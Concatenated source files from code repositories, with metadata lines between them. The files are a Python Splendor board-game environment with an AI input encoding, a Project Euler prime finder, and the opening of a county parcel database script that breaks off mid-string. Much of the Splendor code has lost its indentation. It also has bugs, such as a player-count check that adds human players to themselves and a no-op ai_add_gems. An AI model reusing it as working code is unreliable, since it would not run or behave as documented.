        """Remove num gems of `color`; raise ValueError for untracked colors."""
        if color not in self.data:
            raise ValueError
        self.data[color] -= num

    def total_gems(self):
        """Total number of gems across all five colors."""
        return sum(self.data.values())

    def get_data(self):
        """Return the underlying Color -> count dict."""
        return self.data

    def data_gui(self):
        """Counts as a list in [white, black, green, red, blue] order."""
        return [self.data[c] for c in
                (Color.WHITE, Color.BLACK, Color.GREEN, Color.RED, Color.BLUE)]

    def addGD(self, gd):
        """Return the 'w|k|e|r|b' string of the element-wise sum with `gd`."""
        combined = [a + b for a, b in zip(self.data_gui(), gd.data_gui())]
        return self.gdString(*combined)

    def gdString(self, w, k, e, r, b):
        """Format five counts as 'w|k|e|r|b'."""
        return (str(w)+"|"+str(k)+"|"+str(e)+"|"+str(r)+"|"+str(b))

    def __str__(self):
        return self.gdString(*self.data_gui())
"""
A State will contain:
current_player: A Player object of the player who's turn it currently is
players: A list of Player objects, in turn order, corresponding to each player in the game
tier1_deck: a list of Card objects that make up the remaining cards in the tier 1 deck
tier2_deck: a list of Card objects that make up the remaining cards in the tier 2 deck
tier3_deck: a list of Card objects that make up the remaining cards in the tier 3 deck
tier1: a list of Card objects that represent the tier 1 cards available for purchase
tier2: a list of Card objects that represent the tier 2 cards available for purchase
tier3: a list of Card objects that represent the tier 3 cards available for purchase
available_gems: a GemDict representing the number of gems available to take
gold: an int, the number of gold gems available to take
nobles: a list of GemDicts representing the nobles available for purchase (each noble is worth 3 points)
"""
class State:
"""
Sets up the initial state of the game with a randomized board and gems for the correct number of players.
"""
def __init__(self, num_human_players, num_AI_players):
self._players = []
for i in range(num_human_players):
self._players.append(Player(PlayerType.HUMAN, "HUMAN " + str(i)))
for j in range(num_AI_players):
self._players.append(Player(PlayerType.AI, "AI " + str(j)))
random.shuffle(self._players) #put players in random order
self._current_player = self._players[0] #set current player to first player in list
if num_AI_players+num_human_players == 2:
self._available_gems = GemDict([4,4,4,4,4])
elif num_human_players + num_human_players == 3:
self._available_gems = GemDict([5,5,5,5,5])
else:
self._available_gems = GemDict([7,7,7,7,7])
self._gold = 5
self._tier1_deck = self.gen_tier1()
self._tier2_deck = self.gen_tier2()
self._tier3_deck = self.gen_tier3()
random.shuffle(self._tier1_deck)
random.shuffle(self._tier2_deck)
random.shuffle(self._tier3_deck)
self._tier1 = self._tier1_deck[:4]
self._tier2 = self._tier2_deck[:4]
self._tier3 = self._tier3_deck[:4]
self._tier1_deck = self._tier1_deck[4:]
self._tier2_deck = self._tier2_deck[4:]
self._tier3_deck = self._tier3_deck[4:]
self._nobles = self.gen_nobles()
random.shuffle(self._nobles)
self._nobles = self._nobles[:(num_human_players+num_AI_players+1)] #num nobles available = num players + 1
self._turnCount = 1
self._discarding = False
self._firstWinner = None
self._winners = []
self._running = True
self._interactions = 0
"""Generates a shuffled deck of tier 1 cards."""
def gen_tier1(self):
tier1_deck = []
tier1_deck.append(Card(Color.BLACK, 0, [1, 0, 1, 1, 1], 1))
tier1_deck.append(Card(Color.BLACK, 0, [0, 0, 2, 1, 0], 1))
tier1_deck.append(Card(Color.BLACK, 0, [2, 0, 2, 0, 0], 1))
tier1_deck.append(Card(Color.BLACK, 0, [0, 1, 1, 3, 0], 1))
tier1_deck.append(Card(Color.BLACK, 0, [0, 0, 3, 0, 0], 1))
tier1_deck.append(Card(Color.BLACK, 0, [1, 0, 1, 1, 2], 1))
tier1_deck.append(Card(Color.BLACK, 0, [2, 0, 0, 1, 2], 1))
tier1_deck.append(Card(Color.BLACK, 1, [0, 0, 0, 0, 4], 1))
tier1_deck.append(Card(Color.BLUE, 0, [1, 2, 0, 0, 0], 1))
tier1_deck.append(Card(Color.BLUE, 0, [1, 1, 1, 2, 0], 1))
tier1_deck.append(Card(Color.BLUE, 0, [1, 1, 1, 1, 0], 1))
tier1_deck.append(Card(Color.BLUE, 0, [0, 0, 3, 1, 1], 1))
tier1_deck.append(Card(Color.BLUE, 0, [0, 3, 0, 0, 0], 1))
tier1_deck.append(Card(Color.BLUE, 0, [1, 0, 2, 2, 0], 1))
tier1_deck.append(Card(Color.BLUE, 0, [0, 2, 2, 0, 0], 1))
tier1_deck.append(Card(Color.BLUE, 1, [0, 0, 0, 4, 0], 1))
tier1_deck.append(Card(Color.GREEN, 0, [2, 0, 0, 0, 1], 1))
tier1_deck.append(Card(Color.GREEN, 0, [0, 0, 0, 2, 2], 1))
tier1_deck.append(Card(Color.GREEN, 0, [1, 0, 1, 0, 3], 1))
tier1_deck.append(Card(Color.GREEN, 0, [1, 1, 0, 1, 1], 1))
tier1_deck.append(Card(Color.GREEN, 0, [1, 1, 0, 1, 2], 1))
tier1_deck.append(Card(Color.GREEN, 0, [0, 2, 0, 2, 1], 1))
tier1_deck.append(Card(Color.GREEN, 0, [0, 0, 0, 3, 0], 1))
tier1_deck.append(Card(Color.GREEN, 1, [0, 4, 0, 0, 0], 1))
tier1_deck.append(Card(Color.RED, 0, [3, 0, 0, 0, 0], 1))
tier1_deck.append(Card(Color.RED, 0, [1, 3, 0, 1, 0], 1))
tier1_deck.append(Card(Color.RED, 0, [0, 0, 1, 0, 2], 1))
tier1_deck.append(Card(Color.RED, 0, [2, 2, 1, 0, 0], 1))
tier1_deck.append(Card(Color.RED, 0, [2, 1, 1, 0, 1], 1))
tier1_deck.append(Card(Color.RED, 0, [1, 1, 1, 0, 1], 1))
tier1_deck.append(Card(Color.RED, 0, [2, 0, 0, 2, 0], 1))
tier1_deck.append(Card(Color.RED, 1, [4, 0, 0, 0, 0], 1))
tier1_deck.append(Card(Color.WHITE, 0, [0, 1, 2, 0, 2], 1))
tier1_deck.append(Card(Color.WHITE, 0, [0, 1, 0, 2, 0], 1))
tier1_deck.append(Card(Color.WHITE, 0, [0, 1, 1, 1, 1], 1))
tier1_deck.append(Card(Color.WHITE, 0, [0, 0, 0, 0, 3], 1))
tier1_deck.append(Card(Color.WHITE, 0, [0, 0, 2, 0, 2], 1))
tier1_deck.append(Card(Color.WHITE, 0, [0, 1, 2, 1, 1], 1))
tier1_deck.append(Card(Color.WHITE, 0, [3, 1, 0, 0, 1], 1))
tier1_deck.append(Card(Color.WHITE, 1, [0, 0, 4, 0, 0], 1))
return tier1_deck
"""Generates a shuffled deck of tier 2 cards."""
def gen_tier2(self):
tier2_deck = []
tier2_deck.append(Card(Color.BLACK, 1, [3, 0, 2, 0, 2], 2))
tier2_deck.append(Card(Color.BLACK, 1, [3, 2, 3, 0, 0], 2))
tier2_deck.append(Card(Color.BLACK, 2, [0, 0, 4, 2, 1], 2))
tier2_deck.append(Card(Color.BLACK, 2, [5, 0, 0, 0, 0], 2))
tier2_deck.append(Card(Color.BLACK, 2, [0, 0, 5, 3, 0], 2))
tier2_deck.append(Card(Color.BLACK, 3, [0, 6, 0, 0, 0], 2))
tier2_deck.append(Card(Color.BLUE, 1, [0, 0, 2, 3, 2], 2))
tier2_deck.append(Card(Color.BLUE, 1, [0, 3, 3, 0, 2], 2))
tier2_deck.append(Card(Color.BLUE, 2, [5, 0, 0, 0, 3], 2))
tier2_deck.append(Card(Color.BLUE, 2, [0, 0, 0, 0, 5], 2))
tier2_deck.append(Card(Color.BLUE, 2, [2, 4, 0, 1, 0], 2))
tier2_deck.append(Card(Color.BLUE, 3, [0, 0, 0, 0, 6], 2))
tier2_deck.append(Card(Color.GREEN, 1, [3, 0, 2, 3, 0], 2))
tier2_deck.append(Card(Color.GREEN, 1, [2, 2, 0, 0, 3], 2))
tier2_deck.append(Card(Color.GREEN, 2, [4, 1, 0, 0, 2], 2))
tier2_deck.append(Card(Color.GREEN, 2, [0, 0, 5, 0, 0], 2))
tier2_deck.append(Card(Color.GREEN, 2, [0, 0, 3, 0, 5], 2))
tier2_deck.append(Card(Color.GREEN, 3, [0, 0, 6, 0, 0], 2))
tier2_deck.append(Card(Color.RED, 1, [0, 3, 0, 2, 3], 2))
tier2_deck.append(Card(Color.RED, 1, [2, 3, 0, 2, 0], 2))
tier2_deck.append(Card(Color.RED, 2, [1, 0, 2, 0, 4], 2))
tier2_deck.append(Card(Color.RED, 2, [3, 5, 0, 0, 0], 2))
tier2_deck.append(Card(Color.RED, 2, [0, 5, 0, 0, 0], 2))
tier2_deck.append(Card(Color.RED, 3, [0, 0, 0, 6, 0], 2))
tier2_deck.append(Card(Color.WHITE, 1, [0, 2, 3, 2, 0], 2))
tier2_deck.append(Card(Color.WHITE, 1, [2, 0, 0, 3, 3], 2))
tier2_deck.append(Card(Color.WHITE, 2, [0, 2, 1, 4, 0], 2))
tier2_deck.append(Card(Color.WHITE, 2, [0, 0, 0, 5, 0], 2))
tier2_deck.append(Card(Color.WHITE, 2, [0, 3, 0, 5, 0], 2))
tier2_deck.append(Card(Color.WHITE, 3, [6, 0, 0, 0, 0], 2))
return tier2_deck
"""Generates a shuffled deck of tier 3 cards."""
def gen_tier3(self):
tier3_deck = []
tier3_deck.append(Card(Color.BLACK, 3, [3, 0, 5, 3, 3], 3))
tier3_deck.append(Card(Color.BLACK, 4, [0, 0, 0, 7, 0], 3))
tier3_deck.append(Card(Color.BLACK, 4, [0, 3, 3, 6, 0], 3))
tier3_deck.append(Card(Color.BLACK, 5, [0, 3, 0, 7, 0], 3))
tier3_deck.append(Card(Color.BLUE, 3, [3, 5, 3, 3, 0], 3))
tier3_deck.append(Card(Color.BLUE, 4, [7, 0, 0, 0, 0], 3))
tier3_deck.append(Card(Color.BLUE, 4, [6, 3, 0, 0, 3], 3))
tier3_deck.append(Card(Color.BLUE, 5, [7, 0, 0, 0, 3], 3))
tier3_deck.append(Card(Color.GREEN, 3, [5, 3, 0, 3, 3], 3))
tier3_deck.append(Card(Color.GREEN, 4, [3, 0, 3, 0, 6], 3))
tier3_deck.append(Card(Color.GREEN, 4, [0, 0, 0, 0, 7], 3))
tier3_deck.append(Card(Color.GREEN, 5, [0, 0, 3, 0, 7], 3))
tier3_deck.append(Card(Color.RED, 3, [3, 3, 3, 0, 5], 3))
tier3_deck.append(Card(Color.RED, 4, [0, 0, 7, 0, 0], 3))
tier3_deck.append(Card(Color.RED, 4, [0, 0, 6, 3, 3], 3))
tier3_deck.append(Card(Color.RED, 5, [0, 0, 7, 3, 0], 3))
tier3_deck.append(Card(Color.WHITE, 3, [0, 3, 3, 5, 3], 3))
tier3_deck.append(Card(Color.WHITE, 4, [0, 7, 0, 0, 0], 3))
tier3_deck.append(Card(Color.WHITE, 4, [3, 6, 0, 3, 0], 3))
tier3_deck.append(Card(Color.WHITE, 5, [3, 7, 0, 0, 0], 3))
return tier3_deck
    def gen_nobles(self):
        """Return the full list of noble tiles, each a GemDict of required card colors."""
        nobles = []
        nobles.append(GemDict([0,0,4,4,0]))
        nobles.append(GemDict([3,3,0,3,0]))
        nobles.append(GemDict([4,0,0,0,4]))
        nobles.append(GemDict([4,4,0,0,0]))
        nobles.append(GemDict([0,0,4,0,4]))
        nobles.append(GemDict([0,0,3,3,3]))
        nobles.append(GemDict([3,0,3,0,3]))
        nobles.append(GemDict([0,4,0,4,0]))
        nobles.append(GemDict([3,3,0,0,3]))
        nobles.append(GemDict([0,3,3,3,0]))
        return nobles
"""
Returns whether the game has finished.
"""
def running(self):
return self._running
"""
Set _running to False.
"""
def endGame(self):
self._running = False
"""
Returns the turn count for the game.
"""
def get_turn_count(self):
return self._turnCount
"""
Returns a list of Player objects, in turn order, corresponding to each player in the game.
"""
def get_players(self):
return self._players
"""
Returns a Player object of the current player.
"""
def get_current_player(self):
return self._current_player
"""
Returns the remaining tier1 cards left in the deck as a list of Card objects.
"""
def get_tier1_deck(self):
return self._tier1_deck
"""
Returns the remaining tier2 cards left in the deck as a list of Card objects.
"""
def get_tier2_deck(self):
return self._tier2_deck
"""
Returns the remaining tier3 cards left in the deck as a list of Card objects.
"""
def get_tier3_deck(self):
return self._tier3_deck
"""
Returns the remaining tier1 cards currently on the board as a list of Card objects.
"""
def get_tier1(self):
return self._tier1
"""
Returns the remaining tier2 cards currently on the board as a list of Card objects.
"""
def get_tier2(self):
return self._tier2
"""
Returns the tier3 cards currently on the board as a list of Card objects.
"""
def get_tier3(self):
return self._tier3
"""
Returns the gems available to take as a GemDict object.
"""
def get_avail_gems(self):
return self._available_gems
"""
Returns int of the number of gold gems still available.
"""
def get_num_gold(self):
return self._gold
"""
Returns the nobles remaining on the board.
"""
def get_nobles(self):
return self._nobles
def getNoble(self, noble):
return self._nobles[noble]
def getPlayerReserved(self, player, card):
self._players[player].get_reserved()[card].reserve(card)
return self._players[player].get_reserved()[card]
"""
Returns the index of the current player in the order the players are in.
"""
def current_player_index(self):
return self._players.index(self._current_player)
"""
Changes the current player to the next player in the player list.
"""
def next_player(self):
current = self.current_player_index()
self._current_player = self._players[current+1-len(self._players)]
self._turnCount += 1
"""
Removes one card from the desired tier deck and adds it to the tier cards on the board.
tier: Int. The tier number whose deck a card should be removed from. Also the tier number
on the board that the card will be added to.
If tier = 1, remove from tier 1 deck. If tier = 2, remove from tier 2 deck.
If tier = 3, remove from tier 3 deck. Otherwise the method raises ValueError.
This method is called after a player purchases a card to replenish the cards on the board.
If there are no cards remaining in the desired tier deck, no card is added to the board.
"""
def draw_from_deck(self, tier):
if tier == 1:
if len(self._tier1_deck)!=0:
new_card = self._tier1_deck.pop()
self._tier1.append(new_card)
elif tier == 2:
if len(self._tier2_deck)!=0:
new_card = self._tier2_deck.pop()
self._tier2.append(new_card)
elif tier == 3:
if len(self._tier3_deck)!=0:
new_card = self._tier3_deck.pop()
self._tier3.append(new_card)
else:
raise ValueError
"""
Helper function that removes and returns the top card ot a specified tier deck.
"""
def reserve_from_deck(self, tier):
if tier == 1:
if len(self._tier1_deck)!= 0:
new_card = self._tier1_deck.pop()
return new_card
else:
return None
elif tier == 2:
if len(self._tier2_deck)!= 0:
new_card = self._tier2_deck.pop()
return new_card
else:
return None
elif tier == 3:
if len(self._tier3_deck)!= 0:
new_card = self._tier3_deck.pop()
return new_card
else:
return None
else:
raise ValueError
"""
Removes a card from the cards available to purchase from a specific tier.
tier: Int. The tier from which the card should be removed.
If tier = 1, remove from tier 1. If tier = 2, remove from tier 2. If tier = 3,
remove from tier 3. Otherwise the method raises ValueError.
card: Card object. The card that should be removed from the board.
"""
def remove_tier_card(self, tier, card):
if tier == 1:
del self._tier1[card]
elif tier == 2:
del self._tier2[card]
elif tier == 3:
del self._tier3[card]
else:
raise ValueError
"""
Removes gems from the game's available gems.
gem_lst: list of ints representing the number of gems of each color to remove. The order of the list is
[red, blue, green, white, black]. For example, [0, 1, 3, 0, 2] would representing removing
0 red gems, 1 blue gem, 3 green gems, 0 white gems, and 2 black gems.
"""
def remove_gems(self, gem_lst):
self._available_gems.remove(Color.WHITE, gem_lst[0])
self._available_gems.remove(Color.BLACK, gem_lst[1])
self._available_gems.remove(Color.GREEN, gem_lst[2])
self._available_gems.remove(Color.RED, gem_lst[3])
self._available_gems.remove(Color.BLUE, gem_lst[4])
"""
Adds gems to the game's available gems.
gem_lst: list of ints representing the number of gems of each color to add. The order of the list is
[red, blue, green, white, black]. For example, [0, 1, 3, 0, 2] would representing adding
0 red gems, 1 blue gem, 3 green gems, 0 white gems, and 2 black gems.
"""
def add_gems(self, gem_lst):
self._available_gems.add(Color.WHITE, gem_lst[0])
self._available_gems.add(Color.BLACK, gem_lst[1])
self._available_gems.add(Color.GREEN, gem_lst[2])
self._available_gems.add(Color.RED, gem_lst[3])
self._available_gems.add(Color.BLUE, gem_lst[4])
"""
Removes the given noble from the game's available nobles.
noble: GemDict object. The noble to be removed from the board.
"""
def remove_noble(self, noble):
self._nobles.remove(noble)
"""
Returns the card for the tier and card index specified, or None if it DNE.
"""
def getTierCard(self, tier, card):
c = None
if (tier == 1):
c = self._tier1[card]
elif (tier == 2):
c = self._tier2[card]
elif (tier == 3):
c = self._tier3[card]
return c
"""
Decrements the game's total number of available gold gems by 1.
"""
def decr_gold(self):
self._gold -= 1
"""
Increments the game's total number of available gold gems by 1.
"""
def incr_gold(self):
self._gold += 1
"""
Returns True if the current player is discarding cards.
"""
def get_discarding(self):
return self._discarding
"""
Sets _discarding to dis.
"""
def set_discarding(self, dis):
self._discarding = dis
"""
Returns None if nobody has won; else, a player's name.
"""
def get_firstWinner(self):
return self._firstWinner
"""
Sets _firstWinner to fw.
"""
def set_firstWinner(self, fw):
self._firstWinner = fw
"""
Sets _winners to empty list of winners.
"""
def reset_winners(self):
self._winners = []
"""
Returns list of winners.
"""
def get_winners(self):
return self._winners
"""
Returns winners message.
"""
def get_winners_text(self):
text = ""
if (len(self._winners) == 0):
return "Nobody won... [1000 Turn Limit]"
if (len(self._winners) == 1):
text = "" + self._winners[0] + " Wins!"
elif (len(self._winners) > 1):
for w in self._winners[:-2]:
text += w + ", "
text += self._winners[-2] + " and " + self._winners[-1] + " Win!"
else:
return ""
return text
"""
Add w to _winners.
"""
def add_winner(self, w):
self._winners.append(w)
"""
Adds a player to the game's player list.
player: Player object. The player to be added to the player list. The player is added to
the end of the list (will have the last turn).
"""
def add_player(self, player):
self._players.append(player)
def can_buy_card(self, t, c, r):
card = None
if (r):
card = self._players[t].get_reserved()[c]
else:
if (t == 1):
card = self._tier1[c]
elif (t == 2):
card = self._tier2[c]
elif (t == 3):
card = self._tier3[c]
difference = 0
player = self._current_player
keys = card.get_cost().get_data()
discounts = player.get_discounts().get_data()
adjusted_cost = [0] * 5
#Check if user has enough gems to buy card (adjusted with discounts)
for color in keys:
card_cost = max(keys[color] - discounts[color], 0)
adjusted_cost[color.value] = card_cost
if card_cost < 0:
card_cost = 0
player_cash = player.get_gems().get_data()[color]
if card_cost > player_cash:
difference += card_cost - player_cash
if difference > player.get_gold():
return False
return True
    def toList(self):
        """
        Flattens the entire game state into one flat list of numbers
        (used as a network input vector).
        Layout: players | gold+gems | deck sizes | nobles | tier1 | tier2 | tier3.
        """
        p = []
        i = 0
        for pl in self._players:
            # Each reserved card encodes as 11 numbers: points + one-hot color + cost.
            rsv = []
            k = 0
            for r in pl.get_reserved():
                res = [0] * 5
                res[r.get_color().value] = 1
                rsv += [r.get_points()] + res + r.get_cost().data_gui()
                k += 1
            # Pad to 3 reserve slots.
            for j in range(3-k):
                rsv += [0] * 11
            # 22 - points: presumably a distance-to-goal encoding -- TODO confirm.
            p += rsv + [22-pl.get_points()] + pl.get_colors() + pl.get_discounts().data_gui()
            i += 1
        # Pad to 4 players; each player's segment is 45 numbers.
        for j in range(4-i):
            p += [0] * 45
        g = [self._gold] + self._available_gems.data_gui()
        td = [len(self._tier1_deck)] + [len(self._tier2_deck)] + [len(self._tier3_deck)]
        # Nobles: 5 numbers each, padded to 5 nobles.
        nb = []
        i = 0
        for n in self._nobles:
            nb += n.data_gui()
            i += 1
        for j in range(5-i):
            nb += [0] * 5
        # Face-up cards per tier: 11 numbers each, padded to 4 cards per tier.
        t1 = []
        i = 0
        for t in self._tier1:
            res = [0] * 5
            res[t.get_color().value] = 1
            t1 += [t.get_points()] + res + t.get_cost().data_gui()
            i += 1
        for j in range(4-i):
            t1 += [0] * 11
        t2 = []
        i = 0
        for t in self._tier2:
            res = [0] * 5
            res[t.get_color().value] = 1
            t2 += [t.get_points()] + res + t.get_cost().data_gui()
            i += 1
        for j in range(4-i):
            t2 += [0] * 11
        t3 = []
        i = 0
        for t in self._tier3:
            res = [0] * 5
            res[t.get_color().value] = 1
            t3 += [t.get_points()] + res + t.get_cost().data_gui()
            i += 1
        for j in range(4-i):
            t3 += [0] * 11
        return (p + g + td + nb + t1 + t2 + t3)
    def incr_interactions(self):
        # Bumps the running interaction counter -- presumably user/GUI events.
        self._interactions += 1
    def get_interactions(self):
        return self._interactions
    def input_info(self, stepsLeft):
        """
        Builds the full network input vector: flattened game state, the legal
        move mask for the current player, a one-hot current-player indicator,
        and the number of steps remaining.
        """
        pturn = [0] * 4
        pind = self.current_player_index()
        pturn[pind] = 1
        return (self.toList() + self.possible_moves(pind) +
                pturn + [stepsLeft])
"""
Returns all the possible moves in this state.
Indexes [0...4] for whether it's possible to take at least one of the gem.
Indexes [5...9] for whether it's possible to take at two of the gem.
Indexes [10...24] for whether a card can be reserved; R-to-L, Tier 1 -> 3.
Indexes [25...27] for whether a reserved card can be bought.
Indexes [28...39] for whether a tier card can be bought; Tier 1 -> 3.
Indexes [40...45] for whether the player can discard one of their colors.
"""
def possible_moves(self, cpind):
gm = self.get_avail_gems().data_gui()
cp = self.get_players()[cpind]
canTake1 = [0] * 5
canTake2 = [0] * 5
canReserve = [0] * 15
canBuy = [0] * 15
canDiscard = [0] * 6
if (not self.get_discarding()):
canTake1 = list(map(lambda n : int(n>0), gm))
canTake2 = list(map(lambda n : int(n>3), gm))
if (len(cp.get_reserved()) < 3):
canReserve[0] = int(len(self.get_tier1_deck()) > 0)
canReserve[5] = int(len(self.get_tier2_deck()) > 0)
canReserve[10] = int(len(self.get_tier3_deck()) > 0)
for i in range(len(self.get_tier1())):
canReserve[i+1] = 1
for i in range(len(self.get_tier2())):
canReserve[i+6] = 1
for i in range(len(self.get_tier3())):
canReserve[i+11] = 1
for r in range(len(cp.get_reserved())):
canBuy[r] = int(self.can_buy_card(cpind, r, True))
for t1 in range(len(self.get_tier1())):
canBuy[t1+3] = int(self.can_buy_card(1, t1, False))
for t2 in range(len(self.get_tier2())):
canBuy[t2+7] = int(self.can_buy_card(2, t2, False))
for t3 in range(len(self.get_tier3())):
canBuy[t3+11] = int(self.can_buy_card(3, t3, False))
else:
canDiscard = list(map(lambda n : int(n>0), cp.get_colors()))
return (canTake1 + canTake2 + canReserve + canBuy + canDiscard)
"""
A Card will contain:
color: a Color indicating the discount the card gives
points: an int indicating the number of points the card gives
cost: A GemDict indicating the cost of the card
"""
class Card:
"""
cost_lst: a list of the number of each color of gem that the card costs [red, blue, green, white, black].
For example, [0, 1, 3, 0, 2] would representing the card costing
0 red gems, 1 blue gem, 3 green gems, 0 white gems, and 2 black gems.
"""
def __init__(self, color, points, cost_lst, tier):
self._color = color
self._points = points
self._cost = GemDict(cost_lst)
self._tier = tier
self._reserved = [False, None]
"""Returns the Color indicated the discount the card gives."""
def get_color(self):
return self._color
"""Returns the point value of the card."""
def get_points(self):
return self._points
"""Returns the cost of the card as a Gem Dict."""
def get_cost(self):
return self._cost
"""Returns the tier of the card. One of [1,2,3]."""
def get_tier(self):
return self._tier
"""Returns boolean for whether the card is reserved."""
def reserved(self):
return self._reserved
"""Returns [True, index], where index is the index in its reserve pile."""
def reserve(self, index):
self._reserved = [True, index]
def __str__(self):
return ( str(self._points) + " " + str(self._color) +
"\n\n\n" + "W|K|E|R|B\n" +
str(self.get_cost()) )
"""
A Player will contain:
name: a string representing the name of the player. ex. HUMAN 0 for human player, AI 0 for AI player.
discounts: A GemDict with Color keys and int values. Represents the number of cards of each color a player has.
gems: A GemDict with with Color keys and int values. Represents the number of gems of each color a player has.
gold: an int representing the number of gold gems a player has
reserved: A list of Card objects that the player has reserved
points: The number of points a player has
player_type: A PlayerType indicating whether the player is AI or human
num_cards: An int indicating the number of cards a player has bought (used for end-game tiebreaker).
num_moves: Number of moves the player has taken
gems_taken: list of gem colors in the order that the player took them (only used for AI)
"""
class Player:
"""
Sets up an empty Player object with each of the attributes described above.
"""
def __init__(self, player_type, name):
self._name = name
self._discounts = GemDict([0,0,0,0,0])
self._gems = GemDict([0,0,0,0,0])
self._gold = 0
self._reserved = []
self._points = 0
self._player_type = player_type
self._num_cards = 0
self._num_moves = 0
self._gems_taken = []
self._move_dict = {'take_two' : 0, 'take_three' : 0, 'buy' : 0, 'buy_noble' : 0, 'reserve' : 0, 'reserve_top': 0, 'discard' : 0}
def get_move_dict(self):
return self._move_dict
def add_move_dict(self, move):
self._move_dict[move] += 1
"""
Returns the type of this player.
"""
def get_player_type(self):
return self._player_type
"""
Returns the name of the current player.
"""
def get_name(self):
return self._name
"""
Returns the player's discounts as a GemDict which represents the number of cards of each color a player has.
"""
def get_discounts(self):
return self._discounts
"""
Returns the number of gems of each color the player has.
"""
def get_gems(self):
return self._gems
"""
Returns the number of gold gems a player has.
"""
def get_gold(self):
return self._gold
"""
Returns a list of Card objects the player has reserved.
"""
def get_reserved(self):
return self._reserved
"""
Returns the number of points the player has.
"""
def get_points(self):
return self._points
"""
Returns number of cards the player has bought.
"""
def get_purchased(self):
return self._num_cards
"""
Returns number of cards the player has bought.
"""
def gemGoldAmt(self):
return self._gems.total_gems() + self._gold
"""
Returns the list of all the colors the player owns.
"""
def get_colors(self):
return [self._gold] + self._gems.data_gui()
"""
Increments the player's number of gold gems by 1.
"""
def incr_gold(self):
self._gold += 1
"""
Decrements the player's number of gold gems by 1.
"""
def decr_gold(self):
self._gold -= 1
"""
Adds card to the player's list of reserved cards.
"""
def add_reserved(self, card):
self._reserved.append(card)
card.reserve(self._reserved.index(card))
"""
Removes card from the player's list of reserved cards.
"""
def remove_reserved(self, card):
del self._reserved[card]
"""
Adds the color to the player's discounts.
"""
def set_discount(self, color):
self._discounts.add(color, 1)
"""
Adds the given number of gems in color_lst to the player's total gems. color_lst is a list
of ints representing the number of gems of each color to be added. The order of color_lst is
[red, blue, green, white, black]. For example, [0, 1, 3, 0, 2] would representing adding
0 red gems, 1 blue gem, 3 green gems, 0 white gems, and 2 black gems.
"""
def add_gems(self, color_lst):
self._gems.add(Color.WHITE, color_lst[0])
self._gems.add(Color.BLACK, color_lst[1])
self._gems.add(Color.GREEN, color_lst[2])
self._gems.add(Color.RED, color_lst[3])
self._gems.add(Color.BLUE, color_lst[4])
"""
Removes the given number of gems in color_lst from the player's total gems. color_lst is a list
of ints representing the number of gems of each color to be added. The order of color_lst is
[red, blue, green, white, black]. For example, [0, 1, 3, 0, 2] would representing removing
0 red gems, 1 blue gem, 3 green gems, 0 white gems, and 2 black gems.
"""
def remove_gems(self, color_lst):
self._gems.remove(Color.WHITE, color_lst[0])
self._gems.remove(Color.BLACK, color_lst[1])
self._gems.remove(Color.GREEN, color_lst[2])
self._gems.remove(Color.RED, color_lst[3])
self._gems.remove(Color.BLUE, color_lst[4])
def ai_remove_gems(self, color_lst):
if self._player_type == 2: #use only for AI
for i in range(len(color_lst)):
for j in range(color_lst[i]):
if i == 0:
self._gems_taken.remove(Color.WHITE)
elif i == 1:
self._gems_taken.remove(Color.BLACK)
elif i == 2:
self._gems_taken.remove(Color.GREEN)
elif i == 3:
self._gems_taken.remove(Color.RED)
elif i == 4:
self._gems_taken.remove(Color.BLUE)
"""
Returns list of gems that the player took in the order they took them
"""
def get_gems_ordered(self):
return self._gems_taken
"""
Takes a list of Colors and adds them to the front of the list of gems that have
already been taken
"""
def ai_add_gems(self, color_lst):
color_lst + self._gems_taken
"""
Adds the given number of points to the player's point total.
"""
def set_points(self, num_points):
self._points += num_points
"""
Increments the player's number of purchased cards by 1.
"""
def incr_card_total(self):
self._num_cards += 1
"""
Returns the player's number of moves so far, not including this current one.
"""
def get_num_moves(self):
return self._num_moves
"""
Increments the player's number of moves by 1.
"""
def incr_num_moves(self):
self._num_moves += 1
def __str__(self):
gd = self._gold
gm = self._gems
dc = self._discounts
return (
str(self._points) + " " + self._name + "\n\n\n" +
" G " + "W|K|E|R|B\n" +
"GEMS " + str(gd) + " " + str(gm) + "\n" +
"CARDS " + str(dc) + "\n" +
"_______________________\n" +
"TOTAL " + str(gd) + " " + gm.addGD(dc)
) | ckpalma/splendor-ai | gym-master/gym/envs/splendor/structure.py | structure.py | py | 36,935 | python | en | code | 0 | github-code | 36 |
20349694789 | import time
"""
By listing the first six prime numbers: 2, 3, 5, 7, 11, and 13, we can see that the 6th prime is 13.
What is the 10 001st prime number?
"""
# Check if a number is prime
def is_prime(n):
    """Return True if n is a prime number, False otherwise.

    Uses trial division by odd numbers up to sqrt(n); the original scanned
    up to n/2, which is quadratically more work for no extra correctness.
    """
    if n <= 1:
        return False
    if n == 2:
        return True
    if n % 2 == 0:
        return False
    i = 3
    while i * i <= n:  # a composite n always has a divisor <= sqrt(n)
        if n % i == 0:
            return False
        i += 2
    return True
def main():
    """Find the 10001st prime by scanning odd candidates, then report timing."""
    start = time.time()
    target_index = 10001
    candidate = 13
    primes_found = 6
    # 13 is the 6th prime; keep testing odd numbers until the target is hit.
    while primes_found < target_index:
        candidate += 2
        if is_prime(candidate):
            primes_found += 1
    print("10001st prime number: " + str(candidate))
    finish = time.time()
    print("Execution time : " + str(finish - start))


if __name__ == "__main__":
    main()
| dorinzaharia/project-Euler-solutions | 007/007.py | 007.py | py | 796 | python | en | code | 0 | github-code | 36 |
22163631798 | #!/usr/bin/env python
import csv
import gzip
import json
import os
import re
import sys
import pathlib
import sqlite3
from shapely.geometry import Polygon
from sqlite3 import Error
SCRIPT_DIR = os.path.dirname(os.path.abspath(__file__))
DATA_DIR = os.path.join(SCRIPT_DIR, os.path.join('..', '..', 'outputs', 'butte'))
GEOJSON_FILE = os.path.join(DATA_DIR, 'butte_parcels.geojson')
sql_create_parcel_table = """
CREATE TABLE IF NOT EXISTS parcels (
apn TEXT PRIMARY KEY, -- county specific id for parcel lookup
location TEXT NOT NULL, -- the address or geographical description of parcel
zipcode TEXT NOT NULL, -- the zipcode of the parcel
geo_lat NUMERIC, -- the latitude of the property centroid
geo_lon NUMERIC, -- the longitude of the property centroid
use_code TEXT, -- property use code
lot_size_sqft NUMERIC, -- the lot size in square feet
building_size_sqft NUMERIC, -- the building size in square feet
building_bed_count NUMERIC, -- the number of bedrooms in building
building_bath_count NUMERIC, -- the number of bathrooms in building
building_stories_count NUMERIC, -- the number of stories in building
building_units_count NUMERIC, -- the number of units in building
building_age NUMERIC, -- the year building is built
tax_value NUMERIC -- the appicable assessed tax
);
"""
sql_select_apn_from_parsed = """
SELECT EXISTS(SELECT 1 FROM parcels WHERE apn = ?);
"""
sql_insert_parcel_from_parsed = """
